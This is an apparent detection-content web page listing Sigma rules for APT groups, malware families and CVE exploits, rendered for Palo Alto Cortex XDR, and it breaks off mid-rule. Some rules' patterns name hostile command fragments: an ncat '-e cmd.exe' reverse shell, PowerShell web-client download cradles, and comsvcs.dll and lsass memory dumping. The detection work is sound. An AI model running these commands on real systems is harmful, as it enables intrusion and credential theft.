Tool
EDR / XDR
Palo Alto Cortex XDR
1,524 rules · Sigma detections in Palo Alto Cortex XDR syntax
The same Sigma detection corpus, machine-rendered into Palo Alto Cortex XDR query syntax and ready to paste. Switch platforms above for identical coverage in another language, or choose Sigma (generic) for the portable YAML.
Download all 1,524 rules (.zip, 675 KB)
Every Palo Alto Cortex XDR query in this view, packaged to deploy.
Filter by techniquepick techniques from the ATT&CK matrix
Reconnaissance4
Resource Development5
Initial Access7
Execution25
Persistence31
Privilege Escalation17
Stealth63
Defense Impairment16
Credential Access26
Discovery24
Lateral Movement10
Collection11
Command and Control18
Exfiltration7
Impact10
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
Judge. Each rule shows a quality tier (Strong / Moderate / Basic) and an estimated alert-volume tier (Low / Medium / High FP), both scored deterministically from the rule's shape - status, detection depth, match breadth, log source, documented false positives and references. A rule existing is not the same as a rule being good, or being quiet; hover either tier for the breakdown. The FP estimate reads rule shape, not a measured rate, so use it to pick what to tune first before you deploy.
◈
Detection rules
50 shown of 1,524
critical
Strong
Medium FP
APT27 - Emissary Panda Activity
Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
view Sigma YAML
title: APT27 - Emissary Panda Activity
id: 9aa01d62-7667-4d3b-acb8-8cb5103e2014
status: test
description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
references:
- https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965
- https://twitter.com/cyb3rops/status/1168863899531132929
- https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/
author: Florian Roth (Nextron Systems)
date: 2018-09-03
modified: 2023-03-09
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.stealth
- attack.t1574.001
- attack.g0027
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_sllauncher:
ParentImage|endswith: '\sllauncher.exe'
Image|endswith: '\svchost.exe'
selection_svchost:
ParentImage|contains: '\AppData\Roaming\'
Image|endswith: '\svchost.exe'
CommandLine|contains: '-k'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
High FP
APT29 2018 Phishing Campaign CommandLine Indicators
Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
view Sigma YAML
title: APT29 2018 Phishing Campaign CommandLine Indicators
id: 7453575c-a747-40b9-839b-125a0aae324b
related:
- id: 033fe7d6-66d1-4240-ac6b-28908009c71f
type: obsolete
status: stable
description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
references:
- https://twitter.com/DrunkBinary/status/1063075530180886529
- https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
- https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign
author: Florian Roth (Nextron Systems), @41thexplorer
date: 2018-11-20
modified: 2023-03-08
tags:
- attack.execution
- attack.stealth
- attack.t1218.011
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|contains: '-noni -ep bypass $'
- CommandLine|contains|all:
- 'cyzfc.dat,'
- 'PointFunctionCall'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
APT29 2018 Phishing Campaign File Indicators
Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
view Sigma YAML
title: APT29 2018 Phishing Campaign File Indicators
id: 3a3f81ca-652c-482b-adeb-b1c804727f74
related:
- id: 7453575c-a747-40b9-839b-125a0aae324b # ProcessCreation
type: derived
status: stable
description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
references:
- https://twitter.com/DrunkBinary/status/1063075530180886529
- https://www.mandiant.com/resources/blog/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign
author: '@41thexplorer'
date: 2018-11-20
modified: 2023-02-20
tags:
- attack.stealth
- attack.t1218.011
- detection.emerging-threats
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|contains:
- 'ds7002.lnk'
- 'ds7002.pdf'
- 'ds7002.zip'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
APT31 Judgement Panda Activity
Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
view Sigma YAML
title: APT31 Judgement Panda Activity
id: 03e2746e-2b31-42f1-ab7a-eb39365b2422
status: test
description: Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
references:
- https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html
author: Florian Roth (Nextron Systems)
date: 2019-02-21
modified: 2023-03-10
tags:
- attack.collection
- attack.lateral-movement
- attack.credential-access
- attack.g0128
- attack.t1003.001
- attack.t1560.001
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_ldifde:
CommandLine|contains|all:
- 'ldifde'
- '-f -n'
- 'eprod.ldf'
selection_lateral_movement:
CommandLine|contains|all:
- 'copy \\\\'
- 'c$'
CommandLine|contains:
- '\aaaa\procdump64.exe'
- '\aaaa\netsess.exe'
- '\aaaa\7za.exe'
- '\c$\aaaa\'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
COLDSTEEL RAT Cleanup Command Execution
Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
view Sigma YAML
title: COLDSTEEL RAT Cleanup Command Execution
id: 88516f06-ebe0-47ad-858e-ae9fd060ddea
status: test
description: Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
references:
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-30
tags:
- attack.persistence
- detection.emerging-threats
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\svchost.exe'
ParentCommandLine|contains:
- ' -k msupdate'
- ' -k msupdate2'
- ' -k alg'
Image|endswith: '\rundll32.exe'
CommandLine|contains:
- 'UpdateDriverForPlugAndPlayDevicesW'
- 'ServiceMain'
- 'DiUninstallDevice'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
COLDSTEEL RAT Service Persistence Execution
Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
view Sigma YAML
title: COLDSTEEL RAT Service Persistence Execution
id: 9f9cd389-cea0-4142-bf1a-a3fd424abedd
status: test
description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
references:
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
author: X__Junior (Nextron Systems)
date: 2023-04-30
tags:
- attack.persistence
- detection.emerging-threats
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\svchost.exe'
CommandLine|endswith:
- ' -k msupdate'
- ' -k msupdate2'
- ' -k alg'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
CVE-2021-1675 Print Spooler Exploitation Filename Pattern
Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
view Sigma YAML
title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern
id: 2131cfb3-8c12-45e8-8fa0-31f5924e9f07
status: test
description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
references:
- https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/
- https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare
- https://github.com/cube0x0/CVE-2021-1675
author: Florian Roth (Nextron Systems)
date: 2021-06-29
modified: 2022-12-25
tags:
- attack.execution
- attack.privilege-escalation
- attack.resource-development
- attack.t1587
- cve.2021-1675
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains: 'C:\Windows\System32\spool\drivers\x64\3\old\1\123'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
CVE-2021-31979 CVE-2021-33771 Exploits
Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
view Sigma YAML
title: CVE-2021-31979 CVE-2021-33771 Exploits
id: 32b5db62-cb5f-4266-9639-0fa48376ac00
status: test
description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
references:
- https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
- https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
author: Sittikorn S, frack113
date: 2021-07-16
modified: 2023-08-17
tags:
- attack.initial-access
- attack.execution
- attack.credential-access
- attack.t1566
- attack.t1203
- cve.2021-33771
- cve.2021-31979
- detection.emerging-threats
# - threat_group.Sourgum
logsource:
product: windows
category: registry_set
detection:
selection:
TargetObject|endswith:
- CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32\(Default)
- CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
filter:
Details|endswith:
- system32\wbem\wmiutils.dll
- system32\wbem\wbemsvc.dll
condition: selection and not filter
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
view Sigma YAML
title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
id: ad7085ac-92e4-4b76-8ce2-276d2c0e68ef
status: test
description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
references:
- https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
- https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
author: Sittikorn S
date: 2021-07-16
modified: 2022-10-09
tags:
- attack.initial-access
- attack.execution
- attack.credential-access
- attack.t1566
- attack.t1203
- cve.2021-33771
- cve.2021-31979
- detection.emerging-threats
# - threat_group.Sourgum
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|contains:
- 'C:\Windows\system32\physmem.sys'
- 'C:\Windows\System32\IME\IMEJP\imjpueact.dll'
- 'C:\Windows\system32\ime\IMETC\IMTCPROT.DLL'
- 'C:\Windows\system32\ime\SHARED\imecpmeid.dll'
- 'C:\Windows\system32\config\spp\ServiceState\Recovery\pac.dat'
- 'C:\Windows\system32\config\cy-GB\Setup\SKB\InputMethod\TupTask.dat'
- 'C:\Windows\system32\config\config\startwus.dat'
- 'C:\Windows\system32\ime\SHARED\WimBootConfigurations.ini'
- 'C:\Windows\system32\ime\IMEJP\WimBootConfigurations.ini'
- 'C:\Windows\system32\ime\IMETC\WimBootConfigurations.ini'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
DNS RCE CVE-2020-1350
Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
view Sigma YAML
title: DNS RCE CVE-2020-1350
id: b5281f31-f9cc-4d0d-95d0-45b91c45b487
status: test
description: Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
references:
- https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/
- https://web.archive.org/web/20230329172447/https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html
author: Florian Roth (Nextron Systems)
date: 2020-07-15
modified: 2022-07-12
tags:
- attack.initial-access
- attack.t1190
- attack.execution
- attack.t1569.002
- cve.2020-1350
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\System32\dns.exe'
filter:
Image|endswith:
- '\System32\werfault.exe'
- '\System32\conhost.exe'
- '\System32\dnscmd.exe'
- '\System32\dns.exe'
condition: selection and not filter
falsepositives:
- Unknown but benign sub processes of the Windows DNS service dns.exe
level: critical
Convert to SIEM query
critical
Strong
Medium FP
DarkSide Ransomware Pattern
Detects DarkSide Ransomware and helpers
view Sigma YAML
title: DarkSide Ransomware Pattern
id: 965fff6c-1d7e-4e25-91fd-cdccd75f7d2c
status: test
description: Detects DarkSide Ransomware and helpers
references:
- https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html
- https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/
- https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2
author: Florian Roth (Nextron Systems)
date: 2021-05-14
tags:
- attack.execution
- attack.t1204
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection1:
CommandLine|contains:
- '=[char][byte](''0x''+'
- ' -work worker0 -path '
selection2:
ParentCommandLine|contains: 'DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'
Image|contains: '\AppData\Local\Temp\'
condition: 1 of selection*
falsepositives:
- Unknown
- UAC bypass method used by other malware
level: critical
Convert to SIEM query
critical
Strong
High FP
Droppers Exploiting CVE-2017-11882
Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
view Sigma YAML
title: Droppers Exploiting CVE-2017-11882
id: 678eb5f4-8597-4be6-8be7-905e4234b53a
status: stable
description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
references:
- https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100
- https://www.linkedin.com/pulse/exploit-available-dangerous-ms-office-rce-vuln-called-thebenygreen-
- https://github.com/embedi/CVE-2017-11882
author: Florian Roth (Nextron Systems)
date: 2017-11-23
modified: 2021-11-27
tags:
- attack.execution
- attack.t1203
- attack.t1204.002
- attack.initial-access
- attack.t1566.001
- cve.2017-11882
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\EQNEDT32.EXE'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
DumpStack.log Defender Evasion
Detects the use of the filename DumpStack.log to evade Microsoft Defender
view Sigma YAML
title: DumpStack.log Defender Evasion
id: 4f647cfa-b598-4e12-ad69-c68dd16caef8
status: test
description: Detects the use of the filename DumpStack.log to evade Microsoft Defender
references:
- https://twitter.com/mrd0x/status/1479094189048713219
author: Florian Roth (Nextron Systems)
date: 2022-01-06
modified: 2022-06-17
tags:
- attack.defense-impairment
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\DumpStack.log'
selection_download:
CommandLine|contains: ' -o DumpStack.log'
condition: 1 of selection*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Elise Backdoor Activity
Detects Elise backdoor activity used by APT32
view Sigma YAML
title: Elise Backdoor Activity
id: e507feb7-5f73-4ef6-a970-91bb6f6d744f
status: test
description: Detects Elise backdoor activity used by APT32
references:
- https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting
- https://web.archive.org/web/20200302083912/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2018-01-31
modified: 2023-03-09
tags:
- attack.g0030
- attack.g0050
- attack.s0081
- attack.execution
- attack.t1059.003
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_other_svchost:
Image|endswith: '\Microsoft\Network\svchost.exe'
selection_other_del:
CommandLine|contains|all:
- '\Windows\Caches\NavShExt.dll'
- '/c del'
selection_dll_path:
CommandLine|endswith:
- '\AppData\Roaming\MICROS~1\Windows\Caches\NavShExt.dll'
- '\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll'
selection_dll_function:
CommandLine|contains: ',Setting'
condition: 1 of selection_other_* or all of selection_dll_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
Equation Group DLL_U Export Function Load
Detects a specific export function name used by one of EquationGroup tools
view Sigma YAML
title: Equation Group DLL_U Export Function Load
id: d465d1d8-27a2-4cca-9621-a800f37cf72e
status: stable
description: Detects a specific export function name used by one of EquationGroup tools
references:
- https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=
- https://twitter.com/cyb3rops/status/972186477512839170
author: Florian Roth (Nextron Systems)
date: 2019-03-04
modified: 2023-03-09
tags:
- attack.stealth
- attack.g0020
- attack.t1218.011
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|contains: '-export dll_u'
- CommandLine|endswith:
- ',dll_u'
- ' dll_u'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
EvilNum APT Golden Chickens Deployment Via OCX Files
Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
view Sigma YAML
title: EvilNum APT Golden Chickens Deployment Via OCX Files
id: 8acf3cfa-1e8c-4099-83de-a0c4038e18f0
status: test
description: Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
references:
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/
- https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/
author: Florian Roth (Nextron Systems)
date: 2020-07-10
modified: 2023-03-09
tags:
- attack.stealth
- attack.t1218.011
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'regsvr32'
- '/s'
- '/i'
- '\AppData\Roaming\'
- '.ocx'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Exploit for CVE-2015-1641
Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
view Sigma YAML
title: Exploit for CVE-2015-1641
id: 7993792c-5ce2-4475-a3db-a3a5539827ef
status: stable
description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
references:
- https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/
- https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2018-02-22
modified: 2021-11-27
tags:
- attack.stealth
- attack.t1036.005
- cve.2015-1641
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\WINWORD.EXE'
Image|endswith: '\MicroScMgmt.exe'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
Exploit for CVE-2017-8759
Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
view Sigma YAML
title: Exploit for CVE-2017-8759
id: fdd84c68-a1f6-47c9-9477-920584f94905
status: test
description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
references:
- https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
- https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2017-09-15
modified: 2021-11-27
tags:
- attack.execution
- attack.t1203
- attack.t1204.002
- attack.initial-access
- attack.t1566.001
- cve.2017-8759
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\WINWORD.EXE'
Image|endswith: '\csc.exe'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Exploiting CVE-2019-1388
Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
view Sigma YAML
title: Exploiting CVE-2019-1388
id: 02e0b2ea-a597-428e-b04a-af6a1a403e5c
status: stable
description: Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
references:
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388
- https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
author: Florian Roth (Nextron Systems)
date: 2019-11-20
modified: 2024-12-01
tags:
- attack.privilege-escalation
- attack.t1068
- cve.2019-1388
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_img:
ParentImage|endswith: '\consent.exe'
Image|endswith: '\iexplore.exe'
CommandLine|contains: ' http'
selection_rights:
- IntegrityLevel:
- 'System' # for Sysmon users
- 'S-1-16-16384' # System
- User|contains: # covers many language settings
- 'AUTHORI'
- 'AUTORI'
condition: all of selection_*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moderate
High FP
FlowCloud Registry Markers
Detects FlowCloud malware registry markers from threat group TA410.
The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
view Sigma YAML
title: FlowCloud Registry Markers
id: 5118765f-6657-4ddb-a487-d7bd673abbf1
status: test
description: |
Detects FlowCloud malware registry markers from threat group TA410.
The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
references:
- https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
author: NVISO
date: 2020-06-09
modified: 2024-03-20
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
- detection.emerging-threats
logsource:
product: windows
category: registry_event
detection:
selection:
TargetObject|contains:
- '\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}'
- '\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}'
- '\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}'
- '\SYSTEM\Setup\PrintResponsor\'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
Medium FP
FoggyWeb Backdoor DLL Loading
Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
view Sigma YAML
title: FoggyWeb Backdoor DLL Loading
id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c
status: test
description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
references:
- https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
author: Florian Roth (Nextron Systems)
date: 2021-09-27
modified: 2022-12-09
tags:
- attack.resource-development
- attack.t1587
- detection.emerging-threats
logsource:
category: image_load
product: windows
detection:
selection:
ImageLoaded: 'C:\Windows\ADFS\version.dll'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
Greenbug Espionage Group Indicators
Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
view Sigma YAML
title: Greenbug Espionage Group Indicators
id: 3711eee4-a808-4849-8a14-faf733da3612
status: test
description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
references:
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia
author: Florian Roth (Nextron Systems)
date: 2020-05-20
modified: 2023-03-09
tags:
- attack.stealth
- attack.g0049
- attack.execution
- attack.t1059.001
- attack.command-and-control
- attack.t1105
- attack.t1036.005
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_img:
Image|endswith:
- ':\ProgramData\adobe\Adobe.exe'
- ':\ProgramData\oracle\local.exe'
- '\revshell.exe'
- '\infopagesbackup\ncat.exe'
- ':\ProgramData\comms\comms.exe'
selection_msf:
CommandLine|contains|all:
- '-ExecutionPolicy Bypass -File'
- '\msf.ps1'
selection_ncat:
CommandLine|contains|all:
- 'infopagesbackup'
- '\ncat'
- '-e cmd.exe'
selection_powershell:
CommandLine|contains:
- 'system.Data.SqlClient.SqlDataAdapter($cmd); [void]$da.fill'
- '-nop -w hidden -c $k=new-object'
- '[Net.CredentialCache]::DefaultCredentials;IEX '
- ' -nop -w hidden -c $m=new-object net.webclient;$m'
- '-noninteractive -executionpolicy bypass whoami'
- '-noninteractive -executionpolicy bypass netstat -a'
selection_other:
CommandLine|contains: 'L3NlcnZlcj1' # base64 encoded '/server='
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
Griffon Malware Attack Pattern
Detects process execution patterns related to Griffon malware as reported by Kaspersky
view Sigma YAML
title: Griffon Malware Attack Pattern
id: bcc6f179-11cd-4111-a9a6-0fab68515cf7
status: test
description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
references:
- https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-09
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- '\local\temp\'
- '//b /e:jscript'
- '.txt'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Strong
Medium FP
HAFNIUM Exchange Exploitation Activity
Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
view Sigma YAML
title: HAFNIUM Exchange Exploitation Activity
id: bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7
status: test
description: Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
references:
- https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
- https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3
- https://twitter.com/GadixCRK/status/1369313704869834753?s=20
- https://twitter.com/BleepinComputer/status/1372218235949617161
author: Florian Roth (Nextron Systems)
date: 2021-03-09
modified: 2023-03-09
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1546
- attack.t1053
- attack.g0125
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_attrib:
CommandLine|contains|all:
- 'attrib'
- ' +h '
- ' +s '
- ' +r '
- '.aspx'
selection_vsperfmon:
- Image|contains: '\ProgramData\VSPerfMon\'
- CommandLine|contains|all:
- 'schtasks'
- 'VSPerfMon'
selection_opera_1:
Image|endswith: 'Opera_browser.exe'
ParentImage|endswith:
- '\services.exe'
- '\svchost.exe'
selection_opera_2:
Image|endswith: 'Users\Public\opera\Opera_browser.exe'
selection_vssadmin:
CommandLine|contains|all:
- 'vssadmin list shadows'
- 'Temp\__output'
selection_makecab_1:
Image|endswith: '\makecab.exe'
CommandLine|contains|all:
- 'inetpub\wwwroot\'
- '.dmp.zip'
selection_makecab_2:
Image|endswith: '\makecab.exe'
CommandLine|contains:
- 'Microsoft\Exchange Server\'
- 'compressionmemory'
- '.gif'
selection_7zip:
CommandLine|contains|all:
- ' -t7z '
- 'C:\Programdata\pst'
- '\it.zip'
selection_rundll32:
CommandLine|contains|all:
- '\comsvcs.dll'
- 'Minidump'
- 'full '
- '\inetpub\wwwroot'
selection_other:
CommandLine|contains:
- 'Windows\Temp\xx.bat'
- 'Windows\WwanSvcdcs'
- 'Windows\Temp\cw.exe'
condition: 1 of selection*
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
HackTool - DInjector PowerShell Cradle Execution
Detects the use of the Dinject PowerShell cradle based on the specific flags
view Sigma YAML
title: HackTool - DInjector PowerShell Cradle Execution
id: d78b5d61-187d-44b6-bf02-93486a80de5a
status: test
description: Detects the use of the Dinject PowerShell cradle based on the specific flags
references:
- https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork
author: Florian Roth (Nextron Systems)
date: 2021-12-07
modified: 2023-02-04
tags:
- attack.privilege-escalation
- attack.stealth
- attack.t1055
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- ' /am51'
- ' /password'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moderate
High FP
HackTool - Dumpert Process Dumper Default File
Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
view Sigma YAML
title: HackTool - Dumpert Process Dumper Default File
id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8
related:
- id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
type: derived
status: test
description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
references:
- https://github.com/outflanknl/Dumpert
- https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2023-05-09
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: file_event
product: windows
detection:
selection:
